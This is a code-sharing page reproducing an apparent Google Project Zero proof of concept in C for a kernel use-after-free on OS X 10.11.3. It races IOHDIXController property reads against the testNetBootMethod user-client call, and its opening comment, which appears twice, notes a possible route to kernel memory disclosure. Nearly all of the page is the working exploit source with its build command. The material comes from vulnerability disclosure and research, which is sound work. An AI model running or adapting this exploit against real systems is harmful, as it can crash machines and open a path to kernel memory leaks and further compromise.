扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 |
/* Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=732 This is perhaps a more interesting UaF than just racing testNetBootMethod calls as there looks to be a path to getting free'd memory disclosed back to userspace. Although the copyProperty macro used by is_io_registry_entry_get_property_bin takes the entry's properties lock before reading and taking a reference on the property the testNetBootMethod external method directly calls the overriden setProperty without taking that same lock. ::setProperty calls ::release on all the properties before nulling them out then replacing them with new objects - we can get a UAF if we can get that ::release call to happen before the ::retain in copyProperty. This PoC will crash as a UaF but with more care I believe you could get the OSSerialize to serialize an invalid object leading to a nice kernel memory disclosure. Tested on OS X 10.11.3 El Capitan 15D21 on MacBookAir5,2 */ //ianbeer //build: clang -o hdix_race_get_set hdix_race_get_set.c -framework IOKit -framework Foundation -lpthread /* OS X/iOS kernel UAF racing getProperty on IOHDIXController and testNetBootMethod on IOHDIXControllerUserClient This is perhaps a more interesting UaF than just racing testNetBootMethod calls as there looks to be a path to getting free'd memory disclosed back to userspace. Although the copyProperty macro used by is_io_registry_entry_get_property_bin takes the entry's properties lock before reading and taking a reference on the property the testNetBootMethod external method directly calls the overriden setProperty without taking that same lock. ::setProperty calls ::release on all the properties before nulling them out then replacing them with new objects - we can get a UAF if we can get that ::release call to happen before the ::retain in copyProperty. This PoC will crash as a UaF but with more care I believe you could get the OSSerialize to serialize an invalid object leading to a nice kernel memory disclosure. Tested on OS X 10.11.3 El Capitan 15D21 on MacBookAir5,2 */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <IOKit/IOKitLib.h> #include <libkern/OSAtomic.h> #include <mach/thread_act.h> #include <pthread.h> #include <mach/mach.h> #include <mach/vm_map.h> #include <sys/mman.h> #include <CoreFoundation/CoreFoundation.h> unsigned int selector = 0; uint64_t inputScalar[16]; size_t inputScalarCnt = 0; uint8_t inputStruct[4096]; size_t inputStructCnt = 0; uint64_t outputScalar[16] = {0}; uint32_t outputScalarCnt = 0; char outputStruct[4096] = {0}; size_t outputStructCnt = 0; io_connect_t global_conn = MACH_PORT_NULL; void set_params(io_connect_t conn){ char* payload = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"; global_conn = conn; selector = 4; inputScalarCnt = 0; inputStructCnt = strlen(payload)+1; strcpy((char*)inputStruct, payload); outputScalarCnt = 0; outputStructCnt = 0; } void make_iokit_call(){ IOConnectCallMethod( global_conn, selector, inputScalar, inputScalarCnt, inputStruct, inputStructCnt, outputScalar, &outputScalarCnt, outputStruct, &outputStructCnt); } OSSpinLock lock = OS_SPINLOCK_INIT; void* thread_func(void* arg){ for(;;) { int got_it = 0; while (!got_it) { got_it = OSSpinLockTry(&lock); } make_iokit_call(); } return NULL; } int main(int argc, char** argv){ kern_return_t err; OSSpinLockLock(&lock); pthread_t t; pthread_create(&t, NULL, thread_func, NULL); mach_port_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOHDIXController")); mach_port_t conn = MACH_PORT_NULL; IOServiceOpen(service, mach_task_self(), 0, &conn); set_params(conn); for(;;) { OSSpinLockUnlock(&lock); CFTypeRef p = IORegistryEntryCreateCFProperty(service, CFSTR("di-root-image-result"), kCFAllocatorDefault, 0); } return 0; } |
体验盒子
